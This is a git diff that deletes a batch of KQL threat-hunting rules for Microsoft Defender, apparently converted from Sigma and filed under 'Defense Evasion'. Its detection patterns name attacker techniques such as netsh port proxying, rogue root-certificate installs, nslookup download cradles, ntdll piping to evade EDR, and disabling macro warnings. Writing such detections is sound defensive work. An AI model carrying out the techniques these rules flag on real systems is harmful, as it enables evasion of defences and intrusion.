-| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any"))))
\ No newline at end of file
diff --git a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql b/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql
deleted file mode 100644
index edd848c1..00000000
--- a/Defense Evasion/New_PortProxy_Registry_Entry_Added.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/06/22
-// Level: medium
-// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"
\ No newline at end of file
diff --git a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index bde86a78..00000000
--- a/Defense Evasion/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql b/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql
deleted file mode 100644
index c6f79160..00000000
--- a/Defense Evasion/New_Process_Created_Via_Taskmgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/13
-// Level: low
-// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql
deleted file mode 100644
index 4cc604ab..00000000
--- a/Defense Evasion/New_Root_Certificate_Installed_Via_CertMgr.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023/03/05
-// Level: medium
-// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql b/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql
deleted file mode 100644
index 39fd1adb..00000000
--- a/Defense Evasion/New_Root_Certificate_Installed_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023/03/05
-// Level: medium
-// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Node_Process_Executions.kql b/Defense Evasion/Node_Process_Executions.kql
deleted file mode 100644
index 317037be..00000000
--- a/Defense Evasion/Node_Process_Executions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/04/06
-// Level: medium
-// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
-// Tags: attack.defense_evasion, attack.t1127, attack.t1059.007
-DeviceProcessEvents
-| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js"))
\ No newline at end of file
diff --git a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql b/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql
deleted file mode 100644
index 80c08589..00000000
--- a/Defense Evasion/Non-privileged_Usage_of_Reg_or_Powershell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
-// Date: 2020/10/05
-// Level: high
-// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and ProcessIntegrityLevel =~ "Medium")
\ No newline at end of file
diff --git a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql b/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql
deleted file mode 100644
index b0dfafe0..00000000
--- a/Defense Evasion/Nslookup_PowerShell_Download_Cradle_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/05
-// Level: medium
-// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe")
\ No newline at end of file
diff --git a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql b/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql
deleted file mode 100644
index 97bb7aff..00000000
--- a/Defense Evasion/NtdllPipe_Like_Activity_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/05
-// Level: high
-// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\"
\ No newline at end of file
diff --git a/Defense Evasion/OceanLotus_Registry_Activity.kql b/Defense Evasion/OceanLotus_Registry_Activity.kql
deleted file mode 100644
index af20c10a..00000000
--- a/Defense Evasion/OceanLotus_Registry_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: megan201296, Jonhnathan Ribeiro
-// Date: 2019/04/14
-// Level: critical
-// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey contains "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a" or RegistryKey contains "Classes\\AppX3bbba44c6cae4d9695755183472171e2" or RegistryKey contains "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey contains "\\SOFTWARE\\App" and ((RegistryKey contains "AppXbf13d4ea2945444d8b13e2121cb6b663" or RegistryKey contains "AppX70162486c7554f7f80f481985d67586d" or RegistryKey contains "AppX37cc7fdccd644b4f85f4b22d5a3f105a") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon")))
\ No newline at end of file
diff --git a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql b/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql
deleted file mode 100644
index 6707a71e..00000000
--- a/Defense Evasion/Odbcconf.EXE_Suspicious_DLL_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: high
-// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Office_Macros_Warning_Disabled.kql b/Defense Evasion/Office_Macros_Warning_Disabled.kql
deleted file mode 100644
index e452118e..00000000
--- a/Defense Evasion/Office_Macros_Warning_Disabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings"
\ No newline at end of file
diff --git a/Defense Evasion/OilRig_APT_Registry_Persistence.kql b/Defense Evasion/OilRig_APT_Registry_Persistence.kql
deleted file mode 100644
index 83beccff..00000000
--- a/Defense Evasion/OilRig_APT_Registry_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2018/03/23
-// Level: critical
-// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
-// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql
deleted file mode 100644
index 3ec39e0a..00000000
--- a/Defense Evasion/OneNote_Attachment_File_Dropped_In_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql b/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql
deleted file mode 100644
index 5a82e930..00000000
--- a/Defense Evasion/OpenWith.exe_Executes_Specified_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
-// Date: 2019/10/12
-// Level: high
-// Description: The OpenWith.exe executes other binary
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql b/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql
deleted file mode 100644
index 4dd5005e..00000000
--- a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects a network connection initiated by Cmstp.EXE
-Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
-
-// Tags: attack.defense_evasion, attack.t1218.003
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
deleted file mode 100644
index 88e21026..00000000
--- a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2023/04/28
-// Level: medium
-// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
-// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql b/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql
deleted file mode 100644
index 925798e2..00000000
--- a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql b/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 744c3788..00000000
--- a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where FolderPath contains "__PSScriptPolicyTest_" and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Execution.kql
deleted file mode 100644
index 4e6050fc..00000000
--- a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql
deleted file mode 100644
index c00dd12f..00000000
--- a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: high
-// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_CleanWipe_Execution.kql b/Defense Evasion/PUA_-_CleanWipe_Execution.kql
deleted file mode 100644
index 3da29794..00000000
--- a/Defense Evasion/PUA_-_CleanWipe_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: high
-// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe")
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql b/Defense Evasion/PUA_-_DefenderCheck_Execution.kql
deleted file mode 100644
index d05b1bb7..00000000
--- a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
-// Tags: attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck"
\ No newline at end of file
diff --git a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql b/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql
deleted file mode 100644
index 5d350006..00000000
--- a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Micah Babinski
-// Date: 2022/12/11
-// Level: medium
-// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
-// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit")
\ No newline at end of file
diff --git a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql b/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql
deleted file mode 100644
index 65b83f51..00000000
--- a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder
-// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql b/Defense Evasion/Persistence_Via_New_SIP_Provider.kql
deleted file mode 100644
index 08cf0096..00000000
--- a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll"))))
\ No newline at end of file
diff --git a/Defense Evasion/Ping_Hex_IP.kql b/Defense Evasion/Ping_Hex_IP.kql
deleted file mode 100644
index 5d98cb81..00000000
--- a/Defense Evasion/Ping_Hex_IP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/23
-// Level: high
-// Description: Detects a ping command that uses a hex encoded IP address
-// Tags: attack.defense_evasion, attack.t1140, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "0x" and FolderPath endswith "\\ping.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
deleted file mode 100644
index 8867fa02..00000000
--- a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
